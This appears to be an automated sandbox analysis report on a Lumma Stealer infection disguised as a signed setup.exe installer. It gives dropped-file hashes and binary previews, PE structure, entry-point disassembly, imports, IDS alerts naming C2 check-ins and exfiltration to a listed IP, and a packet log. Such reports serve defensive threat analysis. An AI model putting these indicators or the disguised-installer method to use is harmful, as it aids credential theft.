                                      SHA-256:3BB527137A86322C9BB94D12D96337C386C0BDF21AB0188E88F7B5AA5565B287
                                      SHA-512:E2345B1E3B568DF6089BF880E48756348B3F41C893D1F38C845895C9A36BD2F3F217FEAF8440B66D3ECFCB23A4CEBA102F9BE9C53AF58CEC979A3C2662829E98
                                      Malicious:false
                                      Preview:zxe]...@%...Zw.^9.>'T.....T.. +[vx...eC....!.....O.../d[..wn];_...?O.C"..Cpz...=pJ..."'.LQ..Z.l.-..M..p@.R_......_.a.....`L..%V..r....B.x...5'.b.!...;Ja.Kx...a.R.BB.g.......l...M....g.ez...f7x.."F...56.E7.. =.j......./n`.G..G'R...Li....N.'.>u3...j.X..%..M...4..[....s......).T2.6kS..L..P....D..:m...:.)3Rzd.(.....tzDL*.%..s.+yh..^........`Y.8N.........,..Ti.:a.......O,........X.U..:ho0......].n..k....@.|#..k......i..fX.l.b.C\.He...I...w..=...C.R.v...y.[..1...cK..OQb..s.e...J..snx`.@........*.....a....Q7=.w;.P....PZVF<..N/!]:.8..}[w._..!.....{.....&.....6...G.?..&FJ...m....LR.h.-...;...M}s_.....3.;gp.'....W..^@S...!.KoJ.I.&ml...[..#.K...6.......J..Y.8.E.9.l!...v.Eh..Kr..O>.+....$..(........h.B..+K.../d[.s....:@.@..r....4?4.....:e.n.zp^..0."~QI}h..*.Ce....F...Z.7.BR\....... 8.f....x..:.d....v.(....?.@f.2..y.t.g..F....d.O....X...t...@v....*|....,X.>Z......y.en..h.G)....q...{3.V...&..........u.PW.D...1....s.^..l.k.,zr.K-5.Gk............Y8....
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:DOS executable (COM)
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):6.637196706228119
                                      Encrypted:false
                                      SSDEEP:3072:KPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqV4:KPj0nEo3tb2j6AUkB0CThp6vmV4
                                      MD5:22FED7224B5D03CC9A0388A08771838C
                                      SHA1:E8380A47AB0C67D478D7B54AF35A0D0E998D96FE
                                      SHA-256:D8726603EA5D8CF6DD256D110906DA259967B19380BA7A334FAE01265A6BDAE7
                                      SHA-512:867DBF9432055ED4A09B95C4E21157A9EBD998AD4767F979601CE6821F660FEFABA89919327BAF6196E9FB7B78F1495E048D4828C4B8981C44FC5DB84A0D6B8E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:.W...h.L...h..L..E.P.M..D.........K.P.l....M...........h.L...h.L...h,wL...h..L..h.L..j&..j..U.Y.Q......M..n...E.....j+..j...j#..j...j...j...j...j...j...j..j..j..j..j..j..E..E.....P......P....I......h..........P....I.....J.........=.#M..tHh..I.....I.....t.hh.L.V....I...u....A.h..........Q.........V....I.....h..........P....I......s........F.................s........F................s.........F................s....c....F............m....s....G....F............Q....s....+....F............5....s.........F.................s.........F.................s.........F................3..=h#M....3..=.)M...s......E......F......E....s.......3.@.F........s....t....F.......@....~....s....X....F.......A....b....s....<....F.......B....F....s.... ....F.......C....*.....................t................Ph......$.I.........#M...tU...t....u....L......8~L........L...........}.3.S....[.....L..w..O..W..E.... ..Z......L..P...h..L.....3.@8..#M.u..K.h(.L....3.@8..#M.u..8.L......8.
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):40046
                                      Entropy (8bit):7.995985530508175
                                      Encrypted:true
                                      SSDEEP:768:yl2VcKVXHHXV/jjasuDjGey2zkLSUR7JbP2GcqFIXk75uPLXNMRGD/A9urgk1Ol2:yl2iK9H39HaRFdoSmbPt5jOLmRGjAyg0
                                      MD5:EA1F9FDD115297D606B829A08D02DCF2
                                      SHA1:972C64393EA525F29CB8EE75257772FE48FB8D43
                                      SHA-256:CB8EEE0984FDA76C6DF07EE2561CB59510BA80236F96778DC4F66DC5D4145DA7
                                      SHA-512:0FB6D333670FE12F7FFE4EA4EAD804BC1D027150A6AF94C150729C0BC4779F79A2F679E62E3A90C0CE749723500DB4F7232439B97EAF975FAA5584F6EB07CF1F
                                      Malicious:false
                                      Preview:R1..*n.....0..:d..R.w..%3.m..BX.?......~..\...S.SK.ct(..f'...h.T8.....H.../)(..'..U.b..lE+t....f...c......P|8.S.3`.d.M......9......_8...0..<.C.7.u.d. 8.@{..M..99.3.?...z........mJ.....E@.....e/'.k.5.|....<..........\.V\...C......<.........Z..x.U.f.rT...b..p...~t...^.L......PFw.U.....v..I.=z.vRw.la:e.-4#....iT\ADK.bh..e..l...+.. )MD...{,..Y...X.......J.3}...~v*.Eo%p.>._...GQ.!...ZA.9.M.6...y..G...^.~...S2&..t..U..".O).?.GW....qm.91.f.qc...(.;..1...D(...%..U...............;.p.....1.'v.F.\..............&.....d..$...hU.)e....1.`.?[../~.D9}.ev...-....o......6......n.(?3..+t...Oux.I1..]ng.u....@......|h<q..\H..........T........sp{2...~Qu.w.H^._..!..y...5...bb..^.?o.l.0..Mrk..*.M....":!...6.g.aQ9..H(9ee..W.~.e.@.V...R.h8.M[..Oc.X..x....8)I..@.a&.0...l.j....2....`t...?..H.b.....awR#R.v>2.F...n.....t."k.......Q.Ld5...hqO8};l....9.JM....W..J~.Ym..~B9ej.ug.=_.d.....M.t9,.d.!...C..Y..{.'f.$.k,......|.....\....rz.........A.......$....qx.........
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):5.721489966425017
                                      Encrypted:false
                                      SSDEEP:1536:OhWoXElJUzdlDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7XwH:MWoUlJUPdgQa8Bp/LxyA3laWH
                                      MD5:5264EF29AF53AB79B9BE0E48D8D25E1B
                                      SHA1:C25C09D953ED58FED5A37860F3709E64836792D2
                                      SHA-256:16317BBCF81301FA60999541273E1EA6D779B089116FE9F56B328CFA9A656201
                                      SHA-512:8F1AD44428223B9271CC4785942F923E7A2A1175F0F0B4E544F1C57084040615ABF3545D61FB0C06DD9761B9D144017AAF816F0EBD72F0AA43357DD3629255A8
                                      Malicious:false
                                      Preview:..L$\.L$tf;........D$D.......l$@..D$Du.L$H;..........L$h.Q....\$h.C..)....L$H.D$`.\$p.P...ti.B.;..._....:...L$D..................D$t.....L$@...f;.......f9D$t.......L$`.B..A....B....z..t......D$?..|$?....L$h.@..A....L$l.@..A.....5M..A.....5M..A..................@...........$.....}..u..L$,P..WV..........Z...\$$.E..1..........l$D...,....B..L$H;...D......L$l.Q....\$l.C..\$p.............X...$...A.....b...j..,....L$$....D$ .D$P...H..|$LG.|$L....._........V....}..D$4.\$,.D$..D$0.\$$.D$..u..J.............$........D$D.....L$@...f;.......f9D$D.|....D$\f9D$x.......L$`.B..A....B....z....x.........|$..D$.................M.t9.C...........s...............S..h..M....C............f....T$..E.G.|$..|$0...E..@..4......}......6...G....E..G......7.}....u........3M......X....$.....p5M..D$?.;........V.....5M........5M......D$`t5M..D$ht5M..t$p.{..F..D$H.....V.......V.....6;.r4....t*.I.....D$\.....L$x...f;................u.3..,..t......D$\.....L$x...f;.......f9D$\.....@....a....j.D$?..|$?..L$h.C..A...3M
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):77824
                                      Entropy (8bit):6.754289605573463
                                      Encrypted:false
                                      SSDEEP:1536:h+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CZ:4SAU4CE0Imbi80Z
                                      MD5:F924D29B65337DD04EFB400ECDBBD9B2
                                      SHA1:15680E3E880418DEDA966E0A4A3E4B67CF4CE3B1
                                      SHA-256:33626952B53B46B58AE32C4C7D1A4B054551518C9E050267A2CAD863C6D7A818
                                      SHA-512:0EEFE4043390659D2A25C548B705F73257EC998AB9FED576535AA85406F8A8BA9526E5525583F6D91988747BADF2F0B0F992AC412C41B1FD7FF2C86319E1FB90
                                      Malicious:false
                                      Preview:..YY..t.8] .........p...X....:.............t...-F.J.3.8] j0....E.....K3............'...].Xu...F.B...%......u.!M....E.........1F..F.M..u.......E.............B.%.....E.w..:........e.......j0X.E..M...~S...R.#E.#.M..............j0Yf.......9v...M..U...F.E......E..E.......O.M..E.f..y.f..xW...R.#E.#.M...........b...f...v6j0.F.[....ft...Fu...H..].;E.t.....9u...:...........@...~.Wj0XPV..........E.8.u....} ..4.U......$..p.....R........3......+M...x.....r..F.+......F.-..........j0X....|?.......;.r.j.PSQ.....0.U..F;.u...|.....dr.j.jdSQ.....0.U..F;.u...|......r.j.j.SQ.x....0.U..Fj0X..3....F...}..t..M..P......_^[..]..U.....E.V.u.W.u..u..~.P.E.W.p..0.a.........9M.t..M.3..}.-...+.3......+.E.PW.}.Q3.}.-...3..........P.6........t.......u(.E.j.P.u$.u V.u.W....... _^..]..U....VW.}...~.....3....9E.w....j"^.0......_^..].S.u$.M..B....U .]...t%.M.3......P3..9-.....P.u.S......U ....E...8-u...-.s...~..F...F.E...........3.............9E.t...+..E.h.;J.PV........[..uv.N.8E.t...E.U..B
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):101376
                                      Entropy (8bit):6.3647570127643975
                                      Encrypted:false
                                      SSDEEP:1536:f5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE7:f5elDWy4ZNoGmROL7F1G7ho2kOQ
                                      MD5:A271C89EE02656F8A9C9DC6005A767C1
                                      SHA1:DC1C94CA8DBE68CCE95F5D9082EFA01C9131FB0A
                                      SHA-256:40D95AD335DDFFB637F4E569B19A3DD973D25021FC08E219C20A6B789ADD043A
                                      SHA-512:1CD7B91F63D14932D033A871B5CB6AB9BD692CD10A403240FAC1DA0D74C80F622F3B5723D1A746AF867627EF1C675F7FD6625A11C2FC04711AE57D627677C530
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\setup.exe
                                      File Type:Microsoft Cabinet archive data, 487852 bytes, 12 files, at 0x2c +A "Yale" +A "Kissing", ID 9157, number 1, 29 datablocks, 0x1 compression
                                      Category:dropped
                                      Size (bytes):487852
                                      Entropy (8bit):7.998628853567534
                                      Encrypted:true
                                      SSDEEP:12288:4vD5qWrer43O2ss6DP8Z09WdsAvsYpZ43rizQYY+:WbrerXQ6DP8u9WdsmXZo+
                                      MD5:EE93C2F04396717910ABBFBFD9A151FB
                                      SHA1:29C4C6A67457DF0FA39C60A45A6FD698C3DC484B
                                      SHA-256:ABD5E91C3960DFBEF083C3E63B933E7176168A4B160B782299B9A5CB36943EB3
                                      SHA-512:CFD7A18DD83CCA89256DADC8118CE6C4B01EFF6085E024BF7E53264A23C5D0BDC3BE8E825ED747CB40514DA14F2D1B1FFB60BBA71C7B254E5F87607BFE79C7B7
                                      Malicious:false
                                      Preview:MSCF.....q......,................#..P.................?Z.b .Yale..8........?Z.b .Kissing......>....?Z.b .Accepts...........?Z.b .Vacuum..t........?Z.b .Separate......R....?Z.b .Quotations.....^\....?Z.b .Photographer..t..^P....?Z.b .Continuing.....^.....?Z.b .Hours.....^.....?Z.b .Verde..0..^4....?Z.b .Valium.....^d....?Z.b .Training...H.4..CK.;{|.U..X @.*O.% ..R..e..i..$iH.."mC.6.4)y.PP.2...cd\]Q..".."...+...(...nV.....e.{....Z....8......{....F".....\D..... .e.>....9....J?..../......Cqcs,...6.}.?.0...c.1.1.+...?P.o.....7.....}A.57L....k...9..=...s.{.C...@.<>....../J._...|.q..<......kO........x......7.......7.D.-.;...e.D.I2*.ON.|.R/B..b............h.......O.........].*36..<...<..Nu.%.....~.f,<'.#.%..........<2....*]......(.X..g..{1.(...1FB.b~o.K._.1....^.q.nq..F.j.k..RNq.i..+..c>(#..3.........(...S..e.<.W;..W.....+1.N.O.M.C.f..8.C....i.4...sHp.m..5...=....c..u........'...9...i.......+...P|P...h..a....a%k.P.#..0k.y.Fl...a..k...a{i.....m-mC.U.+.-ou.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1671
                                      Entropy (8bit):4.712685291649495
                                      Encrypted:false
                                      SSDEEP:24:OdyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhBf:v9n9mTsCNvEQH5O5U1nPKrhBf
                                      MD5:2110D5656FE3BAC9ACDDCBB6F981D424
                                      SHA1:0D8CA0EF393419CA1CA453E6C34B7C65FC60B6F3
                                      SHA-256:34846CA023D1742503C2EAAEB6C797268E15FA71DD2FCB9AC4E3C102A6207875
                                      SHA-512:826AB8C4F3252F0A31087E8A6601F9D3BDD9B47A1629F5546210547F994B5AEB11A77631101ABA3CE1E0CAA2CE992C5442DF774C46794817D363E5046B7B518B
                                      Malicious:false
                                      Preview:Tranny........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):4.279946210431455
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:setup.exe
                                      File size:83'896'395 bytes
                                      MD5:c804e1074af9d7cffa16e6bd084bea42
                                      SHA1:dba96c1d8dd56520fcbc65b1d1dd0a8da91e81c5
                                      SHA256:d0710b55aa4f4424d4b14ad320e6615dc230f2af271a1f260ea475141f9d0091
                                      SHA512:950a9a8822cb6df38d710cf1341a79ce25e76e8f145471167dda49f8e6c9e9b22a88836d51ee69b4770c69cef3d161be7fc408de336d1d8a53f1bbad40accadd
                                      SSDEEP:24576:0/8vj/qTTY54U9wn04+riuApVGgH7x86jeIGyghi:HKrHn8Xy3HtjePymi
                                      TLSH:4A0812B627DDA384D9152B20EBC7D0AC607A38B572307A4865EDF24D633B102A6FDF51
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....
                                      Icon Hash:6609488d15988030
                                      Entrypoint:0x403883
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                      Signature Valid:false
                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 09/03/2023 00:00:00 11/03/2025 23:59:59
                                      Subject Chain
                                      • CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                      Version:3
                                      Thumbprint MD5:5F429788727974C52EF1B4CD93D03B8F
                                      Thumbprint SHA-1:CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
                                      Thumbprint SHA-256:4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
                                      Serial:060E2F8F9E1B8BE518D5FE2B69CFCCB1
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      xor ebp, ebp
                                      pop esi
                                      mov dword ptr [esp+18h], ebp
                                      mov dword ptr [esp+10h], 00409268h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [00408030h]
                                      push 00008001h
                                      call dword ptr [004080B4h]
                                      push ebp
                                      call dword ptr [004082C0h]
                                      push 00000008h
                                      mov dword ptr [00472EB8h], eax
                                      call 00007F57CD27B60Bh
                                      push ebp
                                      push 000002B4h
                                      mov dword ptr [00472DD0h], eax
                                      lea eax, dword ptr [esp+38h]
                                      push eax
                                      push ebp
                                      push 00409264h
                                      call dword ptr [00408184h]
                                      push 0040924Ch
                                      push 0046ADC0h
                                      call 00007F57CD27B2EDh
                                      call dword ptr [004080B0h]
                                      push eax
                                      mov edi, 004C30A0h
                                      push edi
                                      call 00007F57CD27B2DBh
                                      push ebp
                                      call dword ptr [00408134h]
                                      cmp word ptr [004C30A0h], 0022h
                                      mov dword ptr [00472DD8h], eax
                                      mov eax, edi
                                      jne 00007F57CD278BDAh
                                      push 00000022h
                                      pop esi
                                      mov eax, 004C30A2h
                                      push esi
                                      push eax
                                      call 00007F57CD27AFB1h
                                      push eax
                                      call dword ptr [00408260h]
                                      mov esi, eax
                                      mov dword ptr [esp+1Ch], esi
                                      jmp 00007F57CD278C63h
                                      push 00000020h
                                      pop ebx
                                      cmp ax, bx
                                      jne 00007F57CD278BDAh
                                      add esi, 02h
                                      cmp word ptr [esi], bx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ C ] VS2010 SP1 build 40219
                                      • [RES] VS2010 SP1 build 40219
                                      • [LNK] VS2010 SP1 build 40219
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x2316.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x4ffffeb0x2860
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xf40000x23160x2400d622028710ffa23845b627aedc1fb1dfFalse0.7804904513888888data6.9654543785696825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xf70000xf320x100015b9f56f7291deb167edde36568be2e9False0.79931640625data6.901933192448209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xf42980xe36PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9483232545354591
                                      RT_ICON0xf50d00x46ePNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061728395061729
                                      RT_ICON0xf55400x2e3PNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148849797023005
                                      RT_ICON0xf58240x249PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0188034188034187
                                      RT_ICON0xf5a700x1fbPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.017751479289941
                                      RT_DIALOG0xf5c6c0x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0xf5d6c0x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0xf5e880x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0xf5ee80x4cdataEnglishUnited States0.7894736842105263
                                      RT_VERSION0xf5f340x10cdataEnglishUnited States0.6417910447761194
                                      RT_MANIFEST0xf60400x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                      DLLImport
                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-31T19:49:44.023631+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.158.151443TCP
                                      2025-01-31T19:49:45.095924+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739172.67.158.151443TCP
                                      2025-01-31T19:49:45.095924+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739172.67.158.151443TCP
                                      2025-01-31T19:49:45.570835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.158.151443TCP
                                      2025-01-31T19:49:46.413595+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449740172.67.158.151443TCP
                                      2025-01-31T19:49:46.413595+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740172.67.158.151443TCP
                                      2025-01-31T19:49:47.037204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.158.151443TCP
                                      2025-01-31T19:49:57.512917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.158.151443TCP
                                      2025-01-31T19:49:59.036455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.158.151443TCP
                                      2025-01-31T19:50:00.310098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.158.151443TCP
                                      2025-01-31T19:50:01.666407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.158.151443TCP
                                      2025-01-31T19:50:01.672675+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449745172.67.158.151443TCP
                                      2025-01-31T19:50:01.672675+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449745172.67.158.151443TCP
                                      2025-01-31T19:50:03.869733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747172.67.158.151443TCP
                                      2025-01-31T19:50:04.369801+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747172.67.158.151443TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 31, 2025 19:49:43.513540983 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:43.513586044 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:43.513689041 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:43.516581059 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:43.516596079 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:44.023562908 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:44.023631096 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:44.036562920 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:44.036590099 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:44.036823034 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:44.087393045 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:44.087393045 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:44.087470055 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.095714092 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.095777988 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.095844030 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.097445965 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.097466946 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.097477913 CET49739443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.097482920 CET44349739172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.109113932 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.109155893 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.109252930 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.112421989 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.112436056 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.570734978 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.570835114 CET49740443192.168.2.4172.67.158.151
